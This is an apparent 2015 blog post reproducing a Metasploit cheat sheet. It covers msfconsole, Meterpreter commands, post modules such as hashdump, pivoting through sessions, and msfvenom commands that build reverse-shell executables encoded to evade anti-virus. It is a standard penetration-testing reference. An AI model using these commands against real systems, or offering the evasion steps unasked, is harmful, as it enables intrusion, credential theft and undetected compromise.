Wednesday, 9 September 2015

Metasploit Cheat Sheet Free Download

Download Cheat Sheet: Metasploit

Meterpreter Post Modules : 

With an available Meterpreter session, post modules can be run on the target machine.

Post Modules from Meterpreter

meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session

msf > use post/windows/gather/hashdumpmsf > show optionsmsf > set SESSION 1msf > run

Useful Auxiliary Modules

Port Scanner:

msf > use auxiliary/scanner/portscan/


msf > set RHOSTS
msf > run

DNS Enumeration

msf > use auxiliary/gather/dns_enummsf > set DOMAIN target.tgtmsf > run

FTP Server

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server

msf > use auxiliary/server/socks4
msf > run

Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.
Use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.


The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former
msfpayload and msfencode tools. Run with
‘’-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]


Reverse Meterpreter payload as an executable and
redirected into a file:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=
LPORT=4444 > met.exe

Format Options (specified with –f)

–help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code

Encoding Payloads with msfvenom

The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]


Encode a payload from msfpayload 5 times using shikataga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST= LPORT=4444 > mal.exe

Metasploit Console Basics (msfconsole)

Search for module:

msf > search [regex]

Specify and exploit to use:

msf > use exploit/[ExploitPath]

Specify a Payload to use:

msf > set PAYLOAD [PayloadPath]

Show options for the current modules:

msf > show options

Set options:

msf > set [Option] [Value]

Start exploit:

msf > exploit

Metasploit Meterpreter

Base Commands:

? / help: Display a summary of commandsexit / quit: Exit the Meterpreter sessionsysinfo: Show the system name and OS typeshutdown / reboot: Self-explanatory

File System Commands:

cd: Change directorylcd: Change directory on local (attacker’s) machinepwd / getwd: Display current working directoryls: Show the contents of the directorycat: Display the contents of a file on screendownload / upload: Move files to/from the target machinemkdir / rmdir: Make / remove directoryedit: Open a file in the default editor (typically vi)

Metasploit Meterpreter (contd)

Process Commands:

getpid: Display the process ID that Meterpreter is running insidegetuid: Display the user ID that Meterpreter is running withps: Display process listkill: Terminate a process given its process IDexecute: Run a given program with the privilegesof the process the Meterpreter is loaded inmigrate: Jump to a given destination process ID– Target process must have same or lesser privileges– Target process may be a more stable process– When inside a process, can access any files that process has a lock on

Network Commands:

ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table

Misc Commands:

idletime: Display the duration that the GUI of the target machine has been idleuictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machinescreenshot: Save as an image a screenshot of the target machine

Additional Modules:

use [module]: Load the specified module

Example:use priv: Load the priv modulehashdump: Dump the hashes from the boxtimestomp:Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:

Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded: msf > exploit –j

List all current jobs (usually exploit listeners):
msf > jobs –l

Kill a job:
msf > jobs –k [JobID]

Multiple Sessions:

List all backgrounded sessions: msf > sessions -l
Interact with a backgrounded session:msf > session -i [SessionID]
Background the current interactive session:meterpreter > <Ctrl+Z> or meterpreter > background

Routing Through Sessions:

All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]


Post a Comment